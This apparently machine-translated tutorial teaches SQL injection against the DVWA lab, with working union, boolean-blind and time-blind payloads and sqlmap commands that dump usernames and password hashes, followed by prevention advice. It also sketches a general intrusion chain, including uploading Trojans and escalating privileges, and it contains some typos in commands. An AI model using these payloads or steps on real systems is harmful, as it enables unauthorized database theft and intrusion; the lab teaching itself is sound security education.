Table of Contents
- 1.SQL Injection SQL injection
- 2. Experiment demonstration
-
- 2.1.low
- 2.3.high
- 2.4. impossible
- 3. sqlmap automatic injection
-
- 3.1. low
- 3.2. medium
- 3.3.high
- 4. SQL injection (blind injection)
- 5. Precautions
1.SQL Injection SQL injection
SQL is a structured query language for manipulating database data. SQL is used when the application data of the web page interacts with the data in the background database. And SQL injection means that the web application does not judge the legality of the user input data or filter it laxly. The attacker adds an extra SQL statement at the end of the pre-defined query statement in the web application, and the original URL of the web page, The parameters entered in the form fields or data packets are modified and spliced into SQL statements, passed to the Web server, and then passed to the database server to execute database commands, and illegal operations are realized without the administrator’s knowledge, so as to deceive the database server into execution Unauthorized arbitrary query, so as to further obtain corresponding data information, modify data, perform administrator operations, read operating system files, execute operating system commands, etc., are security holes that occur in the database layer of the application program. When checking the SQL command contained in the input string, the database mistakenly runs the malicious SQL command as a normal SQL command. For example, the developer of the web application directly transmits the data or cookie input by the user to the database without filtering or verifying (that is, there is an injection point), which may cause the spliced SQL to be executed to obtain information about the database and provide right, a SQL injection attack occurs. SQL injection methods can be roughly divided into two categories: numeric injection and character injection.
Attack method:
1. Boolean-based blind injection
Because the return value of the web page is True or False, so the Boolean blind injection is a way to obtain the database information according to the return value of the page after injection.
2. Time-based blind injection
When the Boolean injection has no result (the page is displayed normally), it is difficult for us to judge whether the injected code is executed, or whether the injection point exists or not? At this time, Boolean injection cannot play its role. The time-based blind injection came into being. The so-called time-based blind injection means that we judge whether there is an SQL injection point on the web page according to the corresponding time difference of the web page.
3. Joint query injection
The premise of using joint query for injection is that the page we want to inject must have a display position. The so-called joint query injection is to use union to combine the result sets of two or more SELECT statements, so two or more selects must have the same columns, and the data types of each column are also the same. Joint query injection can add order by 9 injection based on random numbers at the end of the link, and judge the number of fields in the site according to the returned results of the page.
4. Injection based on error information
This method can only be used when the page does not display a bit, but the echo mysql_error(); function outputs an error message. The advantage is that the injection speed is fast, and the disadvantage is that the statement is more complicated, and the limit can only be used to guess the solution in turn. Generally speaking, error injection is actually a formulaic injection method, which is mainly used when there is no display position on the page, but it is used when echo mysql_error(); outputs an error message.
Injection process:
The first step: SQL injection point detection. Detecting SQL injection points is a critical step. By properly analyzing the application, it is possible to determine where SQL injection points exist. Usually as long as there is a dynamic web page with input submission, and the dynamic web page accesses the database, there may be a SQL injection vulnerability. If the programmer’s information security awareness is not strong, and the database is accessed by dynamically constructing SQL statements, and the validity of the user’s input is not verified, there is a high possibility of SQL injection vulnerabilities. Generally, the error message on the page is used to determine whether there is a SQL injection vulnerability.
Step 2: Collect background database information. Different databases have different injection methods and functions, so before injecting, we must first determine the type of database. There are many ways to judge the database type. You can enter special characters, such as single quotation marks, and let the program return an error message. We can judge according to the error message prompt; you can also use a specific function to judge, such as entering “1 and version()>0”, The program returns normally, indicating that the version() function is recognized and executed by the database, and the version() function is a MySQL-specific function, so it can be inferred that the background database is MySQL.
Step 3: Guess the username and password. The table and field names in the database are generally regular. Guess the table name, field name, number of fields, user name and password in the database in turn by constructing a special SQL statement.
Step 4: Find the web background management entry. WEB background management is usually not open to ordinary users. To find the login URL of the background management, you can use the Web directory scanning tool (such as: wwwscan, AWVS) to quickly search for possible login addresses, and then try one by one to find the login URL of the background management platform URL.
Step Five: Invasion and Destruction. Generally, background management has higher authority and more functions. After successfully logging in to the background management platform using the previously deciphered user name and password, you can destroy it arbitrarily, such as uploading Trojan horses, tampering with web pages, modifying and stealing information, etc. Further privilege escalation and intrusion into Web servers and database servers.
2. Experiment demonstration
Select SQL Injection on the left side of the DVWA page.
The goal is to obtain the passwords of users id1~5 in the database through SQL injection.
2.1.low
DVWA Security is set to low, no defense measures are taken, and SQL queries use raw input.
Enter 2 to view
To determine the type of injection point, enter
1’or 1=1#
If it is executed normally, it means that it is a character type injection.
Determine the database type,
1' union select version(),@@version_compile_os#
Correct execution means that the version() function is recognized and executed by the database, and the version() function is a unique function of MariaDB (MySQL), so it can be inferred that the background database is MySQL and the operating system is linux.
Guess the database name, enter
1' union select database(),user()#
Get the database name dvwa.
Get the table name, information_schema is a table that comes with mysql, this data table saves the information of all databases of the Mysql server, such as the database name, the table of the database, the data type and access permission of the table column, etc. The database has a data table named tables, which contains two fields table_name and table_schema, which respectively record the stored table name and the database where the table name is located in the DBMS.
enter
1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#
It shows that the dvwa database has two tables guestbook and users. Guess users represent the user table.
Get users table column name
1' union select 1, column_name from information_schema.columns where table_schema='dvwa' and table_name='users' #
Among them, dvwa and users are the database name and table name guessed above.
The displayed column names are user_id, first_name, last_name, user, password, avatar, last_login, failed_login. User name and password can be obtained according to user and password.
Get username, password, enter
1' union select user, password from users #
Get the username and password, and the password is encrypted. You can try to decrypt, such as md5.
2.2. medium
DVWA Security is set to Medium, use mysql_real_escape_string() to prevent sql injection, the function is to escape the following characters: \x00, \\
, \r, \, “, \x1a.
User id can only choose
There are two output data. Start burp to capture packets.
The packet captured by burp is sent to the repeater, and the id=1 is changed to
id=1 and 3-1 #
send.
Judgment is numeric injection. Others are the same as the low operation, except that the SQL statement input position is to modify the id value in burp, and single quotes are not required. For example, the query database type is, change id=1 to
id=1 union select version(),@@version_compile_os #
2.3.high
DVWA Security is set to High. This is very similar to the low operation, but this time the attacker enters the value differently. The input value is passed to the vulnerable query via a session variable on another page, rather than directly via a GET request.
First click here_to_change_your_ID on the first page, and then enter the id to be queried on the displayed page.
Enter on the page
1 ' and 1=1 #
The display is normal, it is a character type injection, others are the same as low, the page displayed after the injection point is clicked. such as direct input
1' union select user, password from users #
Obtain the account password.
2.4. impossible
DVWA Security is set to Impossible Level. Queries are now parameterized queries (rather than dynamic queries). Means the query is defined by the developer and distinguishes which parts are code and the rest is data. Currently uncrackable.
3.sqlmap automatic injection
SQLMap is an automated SQL injection tool. Its main function is to scan, discover and exploit SQL injection vulnerabilities in a given URL. It has many built-in bypass plug-ins. The supported databases are MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQ Lite, Firebird, Sybase and SAPMaxDB.
3.1.low
Start burp packet capture
Cookies caught using burp
Start kali terminal input, run
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1 & amp;Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low"
The URL is copied from the browser after entering 1, and the cookie is extracted after packet capture.
Keep typing y. show that there is an injection point
Add –dbs after the above command to get all database names, –batch enters y by default, and the kali terminal runs
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1 & amp;Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low" --dbs --batch
Get the existing database name dvwa, information_schema
Add –current-db after the command to get the current database name. run
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1 & amp;Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low" --current-db --batch
Get the current database named dvwa.
Add -D dvwa –tables after the command to get the table name in the dvwa database.
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1 & amp;Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low" -D dvwa --tables --batch
Obtain the table name guestbook, users in the dvwa database
Add -T users –columns after the command to get the column names in the users table.
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1 & amp;Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low" -D dvwa -T users --columns --batch
Successfully obtained column names. When using -C user,password,user_id –dump, the user id, name, and password will be displayed, and will be automatically decrypted and saved to a local file. Decryption takes some time.
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1 & amp;Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low" -D dvwa -T users -C user,password,user_id --dump
3.2. medium
Start burp packet capture
Copy the captured content and put it into a new file, 1.txt.
run in kali
sqlmap -r "1.txt" --batch
The next steps are the same as low.
3.3.high
The injection point is on the second page, which is the case of cross-page.
Start burp to capture packets, and put the content into the newly created file 2.txt. Note that the captured package is the package captured after clicking submit on the second page.
kali run
sqlmap -r “2.txt” --batch --second-ur "http://127.0.0.1/DVWA/vulnerabilities/sqli/"
The following url is the link to the first page.
Next is the same as low, for example, after running the command to get the database name
sqlmap -r “2.txt” --batch --second-url "http://127.0.0.1/DVWA/vulnerabilities/sqli/session-input.php"
4.SQL injection (blind injection)
The difference between SQL blind injection and general injection is that the general injection attacker can directly see the execution result of the injection statement on the page, but the attacker usually cannot obtain the execution result from the display page during blind injection, even whether the injection statement is Implementation is not known.
Blind injection is like chatting with a robot, but this robot can only answer “yes” and “no”, or observe the time of the response answer. Therefore, you have to ask yes or no from a large range, and then slowly narrow the range , and finally it is a question similar to asking “Is the first character of the database name a?” Through this kind of mechanical inquiry, we finally get the data we want.
There are three types of blind
1) Boolean blind injection: Success and failure are displayed by Boolean values
2) Error blind note: The page displays the database error message;
3) Time Blind Injection: The page has no echo position (Joint injection cannot be used), the page does not display the error message of the database (Error Report injection cannot be used), no matter success or failure, the page only responds to one result (Boolean blind injection cannot be used) When using time blind injection; (Time blind injection, also called delayed injection, judges whether there is injection according to the response time of the page.)
The premise of using blind time injection: there is no display bit on the page, and no SQL statement execution error message is output. The page returned by the correct SQL statement and the wrong SQL statement are the same, but after adding the sleep(5) condition, if the page is delayed for more than 5 seconds, it means that the judgment is established, that is, there is injection;
General steps for blind injection:
1) Determine whether there is an injection, whether the injection is a character or a number
2) Guess the current database name
3) Guess the table name in the database
4) Guess the field name in the table
5) Guess the data
The goal is to get the version of the SQL database software.
low level
The Low-level code does not check and filter the parameter id, and there is an obvious SQL injection vulnerability. At the same time, there are only two types of results returned by the SQL statement query.
Based on the returned data, Boolean blind injection can be performed;
1) Before checking the database, judge the length of the database first:
Input 1′ and length(database())=x #Where x is an integer greater than or equal to 1, when it is displayed, it is the length of the database. When x=4, it is displayed, so the length of the database used by the current page is 4 ;
1′ and length(database())=1 #
1′ and length(database())=4 #
Determine the length of the database name, and then guess the character content sequentially from the first character
Input 1’ and ascii(substr(databse(),1,1))> or
1′ and ascii(substr(database(),1,1)) > 97 #
Existence is displayed, indicating that the ascii value of the first character of the database name is greater than 97 (lowercase character a)
enter
1′ and ascii(substr(databse(),1,1))<122 #
Existence is displayed, indicating that the ASCII value of the first character of the database name is less than 122 (lowercase character z)
Repeat the above steps, use the binary method to guess the characters, and you can get the complete database name dvwa. It is recommended to use code to implement the above process or use sqlmap.
time blind
enter
1 and sleep(5) #
The result will not be delayed to indicate an execution error, and sleep(5) will not be executed later, and it is not a digital injection.
enter
1′ and sleep(5) #
The result will be delayed to indicate that the execution is successful, and the subsequent sleep(5) is executed successfully, which is a character injection.
The next steps are consistent with boolean injection.
5. Preventive measures
SQL injection attacks are very harmful, and it is difficult for firewalls to intercept attacks. The main methods for preventing SQL injection attacks include the following aspects.
1. Hierarchical management
Manage users at different levels and strictly control user permissions. For ordinary users, it is forbidden to grant related permissions such as database creation, deletion, and modification. Only system administrators have the authority to add, delete, modify, and check. Restrictions by design of permissions. Even malicious attackers embed relevant attack codes when submitting data. But because the permissions are set, the code cannot be executed. Thereby reducing the security threat of SQL injection to the database.
2. Parameter pass value
When programmers write SQL language, it is forbidden to directly write variables into SQL statements, and must pass related variables by setting corresponding parameters. Thereby suppressing SQL injection. Data input cannot be directly embedded in a query statement. At the same time, it is necessary to filter the input content and filter out unsafe input data. Or pass input variables by passing parameters by value. This can prevent SQL injection attacks to the greatest extent.
3. Basic filtration and secondary filtration
Before the SQL injection attack, the intruder submits special characters such as “and” by modifying the parameters to determine whether there is a vulnerability, and then writes SQL injection statements through various characters such as select and update. Therefore, to prevent SQL injection, it is necessary to check user input to ensure the security of data input. When checking input or submitted variables, convert or filter characters such as single quotes, double quotes, and colons, thereby effectively preventing SQL injection. Of course, there are many dangerous characters. When obtaining the parameters submitted by the user, basic filtering must be performed first, and then secondary filtering should be performed according to the function of the program and the possibility of user input to ensure the security of the system.
4. Use security parameters
SQL database in order to effectively suppress the impact of SQL injection attacks. Special SQL security parameters are set during the SQLServer database design. When programming, try to use security parameters to prevent injection attacks. Thereby ensuring the security of the system. The SQLServer database provides the Parameters collection. Its function in the database is to perform type checking and length verification on the data. When the programmer adds the Parameters collection during program design, the system will automatically filter out the execution code in the user input and identify it as character value. If the user input contains malicious code, the database can also filter it out during inspection. At the same time, the Parameters collection can also perform mandatory execution checks. Once the check value is out of range. An abnormal error will appear in the system, and the information will be sent to the system administrator at the same time, so that the administrator can take corresponding preventive measures.
5. Multi-layer verification
Today’s website system functions are becoming more and more complex. In order to ensure the security of the system, the visitor’s data input must be strictly verified before entering the system, and the input that fails the verification will be directly refused to access the database, and an error message will be sent to the upper-level system. At the same time, the relevant input information of the visitor is verified in the client access program, so as to prevent simple SQL injection more effectively. But if the lower layer in the multi-layer authentication passes the authentication data, an attacker who bypasses the client can access the system at will. Therefore, when performing multi-layer authentication, each layer needs to cooperate with each other. Only when effective authentication protection is carried out on both the client and the system side can SQL injection attacks be better prevented.
6. Database information encryption. The database information is encrypted so that even if an attacker enters the database, the content of the information cannot be understood.